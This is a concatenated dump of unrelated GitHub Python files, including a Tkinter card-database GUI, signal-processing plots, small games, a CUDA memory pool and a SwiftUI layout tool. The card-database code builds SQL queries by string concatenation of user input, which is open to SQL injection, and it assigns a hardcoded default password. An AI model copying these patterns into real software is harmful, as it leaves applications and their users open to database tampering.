self.admV.pack_forget()\n\n def show(self):\n self.admV.pack()\n\n def cardO(self):\n self.userV.pack_forget()\n self.cardV.pack()\n\n def userO(self):\n self.cardV.pack_forget()\n self.userV.pack()\n\n def newCard(self, databasePanel):\n name=self.cName.get()\n edition=self.cEd.get()\n cRed=self.cCostR.get()\n cBlue=self.cCostBu.get()\n cWhite=self.cCostW.get()\n cBlack=self.cCostBa.get()\n cGreen=self.cCostG.get()\n cLess=self.cCost.get()\n cX=self.cCostx.get()\n cs=self.cCosts.get()\n csv=self.cCostsv.get()\n mType=self.cT1.get()\n sType=self.cT2.get()\n ef=self.cAbility.get()\n rare=self.cRare.get()\n atk=self.cStr.get()\n hp=self.cHP.get()\n cur.execute(\"INSERT INTO card(name,ed_index,cost_Red,cost_Blue,cost_White,cost_Black,cost_Green,cost_colorless,var_colorless,var_special,cost_special,mainType,subType,effect,rarity,attack,defense) Values ('\"+name+\"','\"+edition+\"',\"+cRed+\",\"+cBlue+\",\"+cWhite+\",\"+cBlack+\",\"+cGreen+\",\"+cLess+\",\"+cX+\",'\"+cs+\"',\"+csv+\",'\"+mType+\"','\"+sType+\"','\"+ef+\"','\"+rare+\"','\"+atk+\"','\"+hp+\"');\")\n con.commit()\n databasePanel.refresh()\n \n def delCard(self, databasePanel):\n searchKey=databasePanel.mylistL.get(databasePanel.mylistL.curselection())\n cur.execute(\"DELETE FROM deck WHERE card_name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n cur.execute(\"DELETE FROM cards_owned WHERE card_name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n cur.execute(\"DELETE FROM card WHERE name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n con.commit()\n databasePanel.refresh()\n \n def adduser(self):\n cur.execute(\"INSERT INTO users(name, pass, permission) VALUES('\"+self.userName.get()+\"', 'MightyMouse!', 'Basic_Access');\")\n con.commit()\n self.refresh()\n \n def deluser(self, frameR):\n searchKey=self.userList.get(self.userList.curselection())\n cur.execute(\"select user_ID from users where name='\"+searchKey[0]+\"';\")\n searchKey=str(cur.fetchone()[0])\n cur.execute(\"select deck_ID from owned_decks where user_ID=\"+searchKey+\";\")\n decks=cur.fetchall()\n for x in decks:\n cur.execute(\"DELETE FROM deck WHERE deck_ID=\"+str(x[0])+\";\")\n cur.execute(\"DELETE FROM owned_decks WHERE user_ID=\"+searchKey+\";\")\n cur.execute(\"DELETE FROM cards_owned WHERE user_ID=\"+searchKey+\";\")\n cur.execute(\"DELETE FROM users WHERE user_ID=\"+searchKey+\";\")\n con.commit()\n frameR.refresh()\n\n def seluser(self, rPanel):\n global uID\n uID=self.userList.get(self.userList.curselection())[1]\n rPanel.refresh()\n \n def refresh(self):\n self.userList.delete(0,END)\n cur.execute(\"select name,user_ID from users\")\n userData=cur.fetchall()\n for x in userData:\n self.userList.insert(END, x)\n \nclass rightPanel:\n def __init__(self,root):\n self.frameR = Frame(root)\n self.frameR.pack(side = RIGHT)\n \n self.buttonList = LabelFrame(self.frameR, text=\"View Mode\")\n self.buttonList.pack(fill=X)\n def colButton():\n self.cp.show()\n self.dp.hide()\n self.ap.hide()\n self.cButton = Button(self.buttonList, text=\"collection\", command = colButton)\n self.cButton.pack(side=LEFT)\n def deckButton():\n self.cp.hide()\n self.dp.show()\n self.ap.hide()\n self.dButton = Button(self.buttonList, text=\"deck\", command = deckButton)\n self.dButton.pack(side=LEFT)\n def admButton():\n self.cp.hide()\n self.dp.hide()\n self.ap.show()\n\n self.aButton = Button(self.buttonList, text=\"admin\", command = admButton)\n self.aButton.pack(side=LEFT)\n #self.dp.deckV.pack()\n #self.cp.colV.pack()\n #self.ap.admV.pack()\n self.dp= deckPanel(self.frameR)\n self.cp= collectionPanel(self.frameR)\n self.ap= adminPanel(self.frameR)\n self.dp.hide()\n self.ap.hide()\n self.frameR.pack_forget()\n\n self.pwLogin=LabelFrame(root,text=\"login\")\n self.pwLogin.pack()\n \n self.userIDin=Entry(self.pwLogin)\n self.pwIn=Entry(self.pwLogin, show='*')\n self.userIDin.pack()\n self.pwIn.pack()\n\n self.loginButton = Button(self.pwLogin, text=\"Login\", command = lambda:\n self.login(self.userIDin.get(), self.pwIn.get()))\n self.loginButton.pack(side=LEFT)\n \n def refresh(self):\n self.dp.refresh()\n self.cp.refresh()\n self.ap.refresh()\n def login(self, usrID, pw):\n global user\n user=usrID\n connect(usrID,pw)\n self.frameR.pack()\n self.pwLogin.pack_forget()\n self.refresh()\n \nfrom Tkinter import *\nroot = Tk()\nuser=\"Basic\"\nuID=\"0\"\ncon=conn(user)\ncur=con.cursor()\nframeL = Frame(root)\nframeL.pack(side = LEFT, fill=BOTH)\n\ndata= databasePanel(frameL)\nframeR=rightPanel(root)\n#various function links to external parts of the program (IE updateCard functions to the database panel)\nframeR.cp.selC.config(command=lambda:frameR.cp.updateCard(data))\nframeR.cp.addC.config(command=lambda:frameR.cp.addCard(data))\nframeR.dp.selC.config(command=lambda:frameR.dp.updateCard(data))\nframeR.dp.addC.config(command=lambda:frameR.dp.addCard(data))\nframeR.ap.delC.config(command=lambda:frameR.ap.delCard(data))\nframeR.ap.addC.config(command=lambda:frameR.ap.newCard(data))\nframeR.ap.selU.config(command=lambda:frameR.ap.seluser(frameR))\nframeR.ap.delU.config(command=lambda:frameR.ap.deluser(frameR))\nmainloop()\n","repo_name":"Ceje/Card-Database-CSC335","sub_path":"ProjGUI2.py","file_name":"ProjGUI2.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20396495082","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2013-4-23\n\n@author: Administrator\n@brief mainwindow\n'''\n\nfrom PyQt5 import QtWidgets, QtCore\n\nimport FileDirDiff.UI.ui_mainwindow\nimport FileDirDiff.Frame.LoggerWin\nimport FileDirDiff.Frame.LeftFnWin\n#from FileDirDiff.Core.GlobalIns import GlobalIns\nfrom FileDirDiff.Core.AppSys import AppSys\n\nclass MainWindow(QtWidgets.QMainWindow):\n \n instance = None\n \n def __init__(self, app):\n # make sure multiple instantiation won't happen\n assert(MainWindow.instance is None)\n super(MainWindow, self).__init__()\n \n MainWindow.m_instance = self\n self.m_app = app\n \n self.createUI()\n #实例化全局变量\n #GlobalIns.insGlobal()\n AppSys.instance();\n AppSys.instance().postInit();\n\n\n def createUI(self):\n self.ui = FileDirDiff.UI.ui_mainwindow.Ui_MainWindow()\n self.ui.setupUi(self)\n \n # 可停靠的窗口\n self.m_LoggerWin = FileDirDiff.Frame.LoggerWin.LoggerWin()\n self.addDockWidget(QtCore.Qt.BottomDockWidgetArea, self.m_LoggerWin)\n \n # 左边可停靠窗口\n self.m_LeftFnWin = FileDirDiff.Frame.LeftFnWin.LeftFnWin()\n self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.m_LeftFnWin)\n \n self.m_qttimer = QtCore.QTimer()\n self.m_qttimer.timeout.connect(self.onTimer)\n self.m_qttimer.start( 1000 )\n\n\n def onTimer(self):\n listdata = []\n AppSys.instance().m_logSys.getlogger(listdata)\n for dataitem in listdata:\n self.m_LoggerWin.ui.textEdit.appendPlainText(dataitem)\n\n","repo_name":"codekuangben/Tools","sub_path":"FileDirDiff/FileDirDiff/src/FileDirDiff/Frame/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36770436140","text":"import numpy as np\nfrom numpy.fft import *\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nfpwm = 10000 # pwm freq (Hz)\nf0 = 100 # fundamental freq (Hz)\nfs = 50000\nT = 3 # observation length (s)\nZ = T * 100 # zero stretch length (s)\nt = np.linspace(0, T, fs * T)\nduty = 0.5 + 0.5 * np.sin(2 * np.pi * f0 * t)\n\n# pwm wave with frequency fpwm with a duty cycle that varies according to a cos w/ frequency f0\nx = 0.5 + 0.5 * signal.square(2 * np.pi * fpwm * t, duty)\n\n# apply rc filter\nRC_filter = ([1], [0.003, 1])\ntout, y, tmp = signal.lsim(RC_filter, x, t, interp=False)\n\n# apply windowing function\nwindow = signal.windows.blackmanharris(len(x))\nx_windowed = x * window\ny_windowed = y * window\n\n# zero padding\nx_windowed = np.pad(x_windowed, (0, int(Z * fs)), mode='constant')\ny_windowed = np.pad(y_windowed, (0, int(Z * fs)), mode='constant')\n\nX = fftshift(fft(x_windowed))\nX_db = 20 * np.log10(np.abs(X) + 1)\nf_x = fftshift(fftfreq(len(x_windowed)) * fs)\n\nY = fftshift(fft(y_windowed))\nY_db = 20 * np.log10(np.abs(Y) + 1)\nf_y = fftshift(fftfreq(len(y_windowed)) * fs)\n\n# plot original and filtered pwm wave\nfig1, ax1 = plt.subplots()\nax1.set_ylim(-0.2, 1.2)\nax1.set_xlim(1 / f0, 2 / f0)\nplt.axvline(0, linewidth=1, color='black')\nplt.axhline(0, linewidth=1, color='black')\nx_minor_ticks = np.arange(1 / f0, 2 / f0, 10/fpwm)\nax1.set_xticks(x_minor_ticks, minor=True)\nax1.grid(which='minor', axis='x', alpha=0.5)\nax1.plot(t, x)\nax1.plot(t, y)\nax1.set_xlabel('Time (s)')\nax1.set_ylabel('Value')\nax1.set_title('Square Wave Filtered')\n\n# plot freq spectrum\nfig2, ax2 = plt.subplots()\nax2.plot(f_x, X_db)\nax2.plot(f_y, Y_db)\nax2.set_xlim(-25, 1025)\nx_minor_ticks = np.arange(0, 1000, 100)\nax2.set_xticks(x_minor_ticks, minor=True)\nax2.grid(which='minor', axis='x', alpha=0.5)\nax2.set_xlabel('Frequency (Hz)')\nax2.set_ylabel('Magnitude (dB)')\nax2.set_title('Frequency Spectrum')\n\n# plot RC filter freq response\nw, h = signal.freqresp(RC_filter)\nfig3, ax3 = plt.subplots()\nfreqs = w / (2*np.pi)\nh_db = 20 * np.log10(np.abs(h))\nax3.set_xscale('log')\nax3.set_title(\"RC Filter Frequency Response\")\nax3.set_xlabel('Frequency (Hz)')\nax3.set_ylabel('Magnitude (dB)')\nax3.grid()\nax3.plot(freqs, h_db)\n\nplt.show()\n","repo_name":"rchoudhary/filtering-tests","sub_path":"pwm.py","file_name":"pwm.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12415184386","text":"from view import *\nfrom constraint_solver import *\nfrom functools import reduce\nimport statistics\nfrom copy import deepcopy\n\nclass Hierarchy(View):\n class size_group:\n def __init__(self, view, axis):\n self.axis = axis\n self.mean = view.size(axis)\n self.views = [view]\n\n def append(self, view):\n self.mean *= len(self.views) / (len(self.views) + 1)\n self.mean += view.size(self.axis) / (len(self.views) + 1)\n self.views.append(view)\n\n def pop(self):\n view = self.views.pop()\n self.mean -= view.size(self.axis) / (len(self.views) + 1)\n self.mean *= (len(self.views) + 1) / len(self.views)\n return view\n\n def can_append(self, view, tolerance):\n self.append(view)\n newmean = sum([view.size(self.axis) for view in self.views]) / len(self.views)\n if newmean == 0:\n return False\n valid = abs((newmean - view.size(self.axis)) / self.mean) < tolerance\n self.pop()\n return valid\n\n def enforce(self):\n # sets size of all views to group's mean\n for view in self.views:\n view.bot_right[self.axis] = view.top_left[self.axis] + self.mean\n\n def __init__(self, top_left, bot_right, view_type=ViewType.VStack, children=[]):\n super().__init__(top_left, bot_right, view_type)\n self.children = children\n\n def flatlist(self):\n l = [child.flatlist() if isinstance(child, Hierarchy) else [child] for child in self.children]\n return reduce(lambda a, b: a + b, l)\n\n def solve(self):\n ConstraintSolver([self] + self.children).solve()\n for child in self.children:\n if isinstance(child, Hierarchy):\n child.solve()\n\n def cleanse(self):\n '''Cleans the user-inputted data to match what they likely intended to\n draw. General workflow is cleanse -> solve -> to_swiftui\n '''\n # agree on size\n SIZE_TOLERANCE = .2\n for axis in [0, 1]:\n size_groups = []\n for view in self.children:\n # We don't want to include hierarchies in this calculation\n # because it is unlikely that the user wants it to be the same\n # size, and because it may mess with child views.\n if isinstance(view, Hierarchy):\n continue\n if len(size_groups) == 0:\n size_groups.append(self.size_group(view, axis))\n else:\n size_groups = sorted(size_groups, key=lambda group: abs(group.mean - view.size(axis)))\n if size_groups[0].can_append(view, SIZE_TOLERANCE):\n size_groups[0].append(view)\n else:\n size_groups.append(self.size_group(view, axis))\n for g in size_groups:\n g.enforce()\n\n # snap position\n POS_TOLERANCE = .2\n major_axis = int(self.view_type)\n gap_groups = []\n dists = [0 for i in range(len(self.children) - 1)]\n for i in range(len(self.children) - 1):\n v1, v2 = self.children[i], self.children[i + 1]\n dist = v2.top_left[major_axis] - v1.bot_right[major_axis]\n if len(gap_groups) == 0:\n gap_groups.append([(dist, i)])\n else:\n added = False\n for group in gap_groups:\n mean = sum([p[0] for p in group]) / len(group)\n if mean != 0 and abs((mean - dist)/mean) < POS_TOLERANCE:\n group.append((dist, i))\n added = True\n break\n\n if not added:\n gap_groups.append([(dist, i)])\n for group in gap_groups:\n avg = sum([p[0] for p in group]) / len(group)\n for p in group:\n dists[p[1]] = avg\n\n running_dist = self.children[0].top_left[major_axis]\n for i, dist in enumerate(dists):\n running_dist += self.children[i].size(major_axis)\n running_dist += dist\n diff = [0, 0]\n diff[major_axis] = running_dist - self.children[i + 1].top_left[major_axis]\n self.children[i + 1].move(diff)\n\n # minor\n minor_axis = (int(self.view_type) + 1) % 2\n leading = self.top_left[minor_axis]\n trailing = self.bot_right[minor_axis]\n center = (leading + trailing) / 2\n for view in self.children:\n leaddist = abs(leading - view.top_left[minor_axis])\n traildist = abs(trailing - view.bot_right[minor_axis])\n centdist = abs(center - view.center(minor_axis))\n diff = [0, 0]\n # if leaddist < traildist and leaddist < centdist:\n # diff[minor_axis] = leading - view.top_left[minor_axis]\n # elif traildist < centdist:\n # diff[minor_axis] = trailing - view.bot_right[minor_axis]\n if centdist / self.size(minor_axis) < .2:\n diff[minor_axis] = center - view.center(minor_axis)\n view.move(diff)\n\n for child in self.children:\n if isinstance(child, Hierarchy):\n child.cleanse()\n\n def to_swiftui(self):\n suffix = super().to_swiftui()[len(VIEW_DEFAULT):]\n stackargs = []\n if self.alignment != 1:\n if self.view_type == ViewType.VStack:\n stackargs.append(f\"alignment: {'.leading' if self.alignment == 0 else '.trailing'}\")\n if self.view_type == ViewType.HStack:\n stackargs.append(f\"alignment: {'.top' if self.alignment == 0 else '.bottom'}\")\n if self.spacing_constraint > 0:\n stackargs.append(f\"spacing: {self.spacing_constraint}\")\n stacktype = \"HStack(\" if self.view_type == ViewType.HStack else \"VStack(\"\n\n content = '\\n'.join([view.to_swiftui() for view in self.children])\n return stacktype + ', '.join(stackargs) + ') {\\n' + content + '\\n}' + suffix\n\n def deepcopy(self):\n children = [child.deepcopy() for child in self.children]\n return Hierarchy(deepcopy(self.top_left), deepcopy(self.bot_right), self.view_type, children=children)\n\n def move(self, diff):\n super().move(diff)\n for child in self.children:\n child.move(diff)\n\ndef divide_views(views, axis):\n '''Divides the given views by the axis where possible.\n axis: 0 = y, 1 = x\n returns: hiearchy, hierarchy_complexity\n '''\n views = sorted(views, key=lambda view: view.bot_right[axis])\n divided = []\n while len(views) > 0:\n cur = views.pop(0)\n section = [cur]\n while len(views) > 0 and min([view.top_left[axis] for view in views]) < cur.bot_right[axis]:\n cur = views.pop(0)\n section.append(cur)\n divided.append(section)\n\n hierarchy_complexity = 1\n children = []\n for section in divided:\n if len(section) == 1:\n children.extend(section)\n else:\n sub_root, complexity = divide_views(section, (axis + 1) % 2)\n children.append(sub_root)\n hierarchy_complexity += complexity\n top_left = [min([view.top_left[0] for view in children]), min([view.top_left[1] for view in children])]\n bot_right = [max([view.bot_right[0] for view in children]), max([view.bot_right[1] for view in children])]\n root_hierarchy = Hierarchy(top_left, bot_right, view_type=ViewType(axis), children=children)\n return root_hierarchy, hierarchy_complexity\n\ndef infer_hierarchy(views):\n '''Takes in a flat list of views and infers hierarchy'''\n root = views.pop(0)\n vert_hierarchy, vert_complexity = divide_views(views, 0)\n hori_hierarchy, hori_complexity = divide_views(views, 1)\n (_, hierarchy) = min((vert_complexity, vert_hierarchy), (hori_complexity, hori_hierarchy))\n # We do this to enforce that the root view has the same dimensions as supplied. Otherwise,\n # the default behavior is that the root view will be the smallest it can be such that it can\n # fit all of its subviews.\n hierarchy.top_left = root.top_left\n hierarchy.bot_right = root.bot_right\n return hierarchy\n","repo_name":"RuohanHu/SwynthUI","sub_path":"src/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25815707035","text":"import torch\n\n\nclass CudaGraphPool:\n \"\"\"\n Memory pool for CUDA graphs.\n \"\"\"\n\n def __init__(self, size, device=\"cuda\"):\n \"\"\"\n :param size: size of the pool in bytes.\n \"\"\"\n assert (size > 0) and (size % 8 == 0), f\"Size must be positive and multiple of 8, got {size}\"\n self.pool: torch.Tensor = torch.empty(size, dtype=torch.int8, device=device)\n self.size = len(self.pool.untyped_storage())\n self.offset = 0\n\n def copy_to_pool(self, t: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Copy the tensor t in the pool and return a tensor that is a view of the pool.\n :param t: tensor to copy in the pool\n :return: tensor copy (that is a view of the pool)\n \"\"\"\n\n assert t.device == self.pool.device\n assert self.can_store(t)\n # 64 bits alignment\n tensor_aligned_size = get_aligned_size(t)\n new_offset = self.offset + tensor_aligned_size\n # removes 0s from stride\n stride_fixed = tuple(i if i > 0 else 1 for i in t.stride())\n # offset is expressed in t.dtype number of elements\n new_t = torch.as_strided(\n self.pool.view(t.dtype), size=t.size(), stride=stride_fixed, storage_offset=self.offset // t.element_size()\n )\n new_t.copy_(t)\n self.offset = new_offset\n return new_t\n\n def can_store(self, t: torch.Tensor) -> bool:\n \"\"\"\n Check if the tensor t can be stored in the pool.\n :param t: tensor to check\n :return: True if the tensor can be stored in the pool\n \"\"\"\n return (self.pool.device == t.device) and (self.size - self.offset >= get_aligned_size(t))\n\n def reset(self):\n \"\"\"\n Reset the pool offset to 0.\n \"\"\"\n self.offset = 0\n\n\ndef get_aligned_size(t: torch.Tensor, alignment=8) -> int:\n \"\"\"\n Get the aligned size of the tensor t.\n :param t: tensor to get the aligned size of\n :param alignment: alignment size\n :return: aligned size\n \"\"\"\n storage_len = len(t.untyped_storage())\n alined_storage_len = (storage_len + alignment - 1) // alignment * alignment\n return alined_storage_len\n","repo_name":"ELS-RD/kernl","sub_path":"src/kernl/optimizer/pool_cuda_graphs.py","file_name":"pool_cuda_graphs.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":1388,"dataset":"github-code","pt":"21"} +{"seq_id":"41979026651","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scorecard import Scorecard\nimport time\n\n\nscreen = Screen()\nscreen.setup(800, 600)\nscreen.title(\"PONG\")\nscreen.bgcolor(\"black\")\nscreen.tracer()\n\nplayer_one = Paddle((-380, 0))\nplayer_two = Paddle((370, 0))\nscorecard = Scorecard()\n\nscreen.listen()\nscreen.onkey(player_one.move_up, 'w')\nscreen.onkey(player_one.move_down, 's')\nscreen.onkey(player_two.move_up, 'Up')\nscreen.onkey(player_two.move_down, 'Down')\n\ngame_is_on = True\nball = Ball()\n\nwhile game_is_on:\n screen.update()\n time.sleep(0.05)\n ball.move_forward()\n ball_x_pos = ball.pos()[0]\n ball_y_pos = ball.pos()[1]\n if ball_y_pos > 270 or ball_y_pos < -270:\n ball.change_direction()\n if ball.distance(player_one) < 30 or ball.distance(player_two) < 30:\n ball.paddle_bounce()\n\n if ball_x_pos > 380:\n scorecard.player_one_score += 1\n scorecard.update_score()\n\n if ball_x_pos < -380:\n scorecard.player_two_score += 1\n scorecard.update_score()\n\nscreen.exitonclick()","repo_name":"tamilselvanyes/Python","sub_path":"100Day Challenge/Day22/pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74600165811","text":"import random\n\n\nstages = ['''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========\n''', '''\n +---+\n | |\n |\n |\n |\n |\n=========\n''']\n\n\nEnd_of_selection = False\nword_list = [\"ardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\nlives = 6\n\nprint(f\"The chosen word is \\\"{chosen_word}\\\"\")\n\ndisplay = []\n\nfor _ in range(word_length):\n display += \"_\"\n\nGuess_checker = False\n\nwhile not End_of_selection:\n \n all_guesses = \"\"\n\n guess = input(\"Guess a letter: \").lower()\n \n for character in guess:\n all_guesses += character\n\n while Guess_checker:\n if guess in all_guesses:\n print(\"You have guessed that letter already.\\nPlease guess a different letter.\")\n Guess_checker = False\n # while not Repitition_check: \n\n \n # for character in guess:\n # all_guesses += character\n\n # if guess in all_guesses:\n # print(\"You have guessed that letter already.\\n Please guess another letter.\")\n # else:\n # Repitition_check = True\n\n for position in range(word_length):\n if chosen_word[position] == guess:\n display[position] = guess\n \n\n if guess not in chosen_word:\n lives -= 1\n if lives == 0:\n End_of_selection = True\n print(\"You lose.\")\n\n print(f\"{' '.join(display)}\")\n\n if \"_\" not in display:\n End_of_selection = True\n print(\"You win.\")\n\n print(stages[lives])\n Guess_checker = True","repo_name":"lanrelawal2002/ANGELAYU-100DAYSPYTHON","sub_path":"day7/7-4-Hangman4b.py","file_name":"7-4-Hangman4b.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13948000006","text":"#-----------------------------------------------------------------------\n# drunkenturtle.py\n#-----------------------------------------------------------------------\n\nimport sys\nimport random\nimport stddraw\nimport turtle\n\n#-----------------------------------------------------------------------\n\n# Accept as command-line arguments an integer t specifying a number of \n# iterations, and a float step specifying a step size. Create a Turtle\n# object, and have it make random steps of the given step size. Repeat\n# t times.\n\ndef main(args):\n t = int(args[1])\n step = float(args[2])\n stddraw.createWindow()\n myTurtle = turtle.Turtle(0.5, 0.5, 0.0)\n for t1 in range(t):\n myTurtle.turnLeft(360.0 * random.random())\n myTurtle.goForward(step)\n stddraw.show()\n stddraw.wait()\n\nif __name__ == '__main__':\n main(sys.argv)\n \n#-----------------------------------------------------------------------\n\n# Example execution:\n#\n# python drunkenturtle.py 10000 .01\n","repo_name":"kuninagakura/pyStdDraw","sub_path":"drunkenturtle.py","file_name":"drunkenturtle.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29043413828","text":"with open('primenumbers.txt', 'r') as prime_nums:\n primes = prime_nums.read()\n\nwith open('happynumbers.txt', 'r') as happy_nums:\n happy = happy_nums.read()\n\nprimes = list(map(int, primes.split())) # Convert to int\nhappy = list(map(int, happy.split()))\n\nsame = [a for a in primes if(a in happy)]\n\nprint(same)\n","repo_name":"Vraised3/PracticePython.org","sub_path":"23.File_Overlap.py","file_name":"23.File_Overlap.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42188986533","text":"# USAGE : python ./monitorTorque.py LOGFILE\n\n# Author : Bruno Blais\n# Last modified : 23-01-2014\n\n#Python imports\n#----------------\nimport os\nimport sys\nimport numpy\nimport time\nimport matplotlib.pyplot as plt\nimport re # Ouhh regular expressions :)\n#----------------\n\n#********************************\n# OPTIONS AND USER PARAMETERS\n#********************************\nomega = 1.*2.*numpy.pi\nL=0.01\nR=0.0238\nk = 0.0064/0.0238\nmu=1\n#Analytical solution for the Torque in the couette geometry\n# OK la solution analytique elle est bonne \ntorque = -4.*numpy.pi*mu*omega*R*R*L*(k*k/(1.-k*k))\n#torque= -4*numpy.pi*mu*omega*L*(1./((k*R)**(-2.) - R**(-2.))) \n\n#======================\n# MAIN\n#======================\n\nfname=sys.argv[1]\n\n#Labeling\nax = plt.figure(\"Torque\") #Create window\nplt.ylabel('Torque [N-m]')\nplt.xlabel('Time [s]')\nplt.title('Dynamic evolution of the Torque')\n\n[t,dragX,dragY,dragZ, momentX, momentY, momentZ] = numpy.loadtxt(fname, unpack=True)\nplt.plot(t,momentZ,label='Numerical solution')\nplt.plot(t,t/t*torque,'-',label='Analytical solution')\nplt.legend()\n\nprint (\"==============================================================================\")\nprint (\" ANALYSIS\")\nprint (\"Ratio of measured torque over analytical solution is : \", momentZ[-1]/torque)\nprint (\"Ideal solution is 1\")\nprint (\"==============================================================================\")\nplt.show()\n\n","repo_name":"blaisb/CFDEMcoupling-Mirror","sub_path":"functionalTests/cfdemSolverPisoIBm-legacy/couette/CFD/validateTorque.py","file_name":"validateTorque.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10450728402","text":"# 에디터 -- 카카오에 비슷한 문제가 있었는데 보자.\n# 기본적으로 0. 추가되면 +1씩\n# 글자를 stack을 이용하는 것 같은데\n'''\nA스택 B스택으로 나눠서 문제를 해결\n\nA스택 : 커서보다 앞에 있는 아이들\nB스택 : 커서보다 뒤에 있는 아이들\n초기 커서 위치는 user_input length와 같다.\n'''\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nstack_A,stack_B = list(input().strip()),deque()\ncommand_number = int(input())\n\nfor _ in range(command_number):\n command = input().strip()\n\n if \"P\" in command:\n add_letter = command[-1]\n stack_A.append(add_letter)\n\n else:\n if command == \"L\" and stack_A:\n stack_B.appendleft(stack_A.pop())\n\n elif command==\"D\" and stack_B:\n stack_A.append(stack_B.popleft())\n\n elif command ==\"B\" and stack_A:\n stack_A.pop()\n\nprint(\"\".join(stack_A)+\"\".join(stack_B))\n\n\n\n\n\n\n\n\n","repo_name":"inkyu0103/BOJ","sub_path":"DataStructure/1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3398105320","text":"# This file defines the object for the district level queries/stats\nimport pymongo\nimport YearStat\n\nnum_years = 5\n\nclass DistObject:\n\n def __init__(self, doc_collection: pymongo.collection.Collection, species: str, residency: str, district: str,\n end_year: int, query_data=True):\n self.start = end_year - num_years + 1\n self.end = end_year\n self.years = [num for num in range(self.start, self.end + 1)]\n self.district = district\n self.doc_coll = doc_collection\n self.species = species.upper()\n self.residency = residency.upper()\n self.year_stats = None\n\n if query_data:\n self.year_stats = [YearStat.YearStat(year) for year in self.years]\n self.query_district_data()\n \n \n def query_district_data(self):\n \"\"\"This function fetches the data for the districts within the region defined in the properties above and formats it to fit\n within the self.data list.\"\"\"\n pipeline = [\n {\n '$match': {'residency': self.residency, 'species': self.species, 'district': self.district,\n 'dwg_year': {'$gte': self.start, '$lte': self.end}}\n },\n {\n '$set': {'wa_points': {'$multiply': ['$applicants', '$point_val']}}\n },\n {\n '$group': {'_id': {'year': '$dwg_year'},\n 'sum_apps': {'$sum': '$applicants'},\n 'sum_tags': {'$sum': '$successes'},\n 'sum_pts': {'$sum': '$total_points'},\n 'sum_wa_pts': {'$sum': '$wa_points'}\n }\n },\n {\n '$sort': {'_id': pymongo.ASCENDING}\n }\n ]\n\n results = self.doc_coll.aggregate(pipeline)\n\n # loop through results, assigning values to YearStat objects\n for stat in results:\n yr_stat_obj = self.year_stats[stat['_id']['year'] - self.start]\n \n yr_stat_obj.set_apps(stat['sum_apps'])\n yr_stat_obj.set_successes(stat['sum_tags'])\n yr_stat_obj.set_pts_spent(stat['sum_pts'])\n yr_stat_obj.set_perc_success()\n yr_stat_obj.set_avg_pts_per_app(stat['sum_wa_pts']) \n\n def get_tags(self):\n \"\"\"This function gets the tags within the district passed in as an argument\"\"\"\n pipeline = [\n {\n '$match': {'residency': self.residency, 'species': self.species, 'district': self.district,\n 'dwg_year': {'$gte': self.start, '$lte': self.end}}\n },\n {\n '$group': {'_id': {'tag num': '$tag_num'}}\n },\n {\n '$sort': {'_id': pymongo.ASCENDING}\n }\n ]\n results = self.doc_coll.aggregate(pipeline)\n return list(results)\n\n def get_stats_dict_format(self, stat_list):\n new_list = [0] * len(stat_list)\n for i, stat in enumerate(stat_list):\n new_list[i] = stat.convert_to_dict()\n return new_list\n\n def convert_to_dict(self):\n return {\n \"district\": self.district,\n \"species\": self.species,\n \"years\": [num for num in range(self.start, self.end + 1)],\n \"residency\": self.residency,\n \"year stats\": self.get_stats_dict_format(self.year_stats),\n }\n","repo_name":"philip-peiffer/hunting-stats","sub_path":"Queries/DistObject.py","file_name":"DistObject.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11524579093","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\n\n#loading data\n\ntrain_dataset = torchvision.datasets.MNIST(root = './data',download = True,train = True, transform = transforms.ToTensor())\ntest_dataset = torchvision.datasets.MNIST(root = './data',train = False, transform = transforms.ToTensor())\n\ntrainloader = torch.utils.data.DataLoader(dataset = 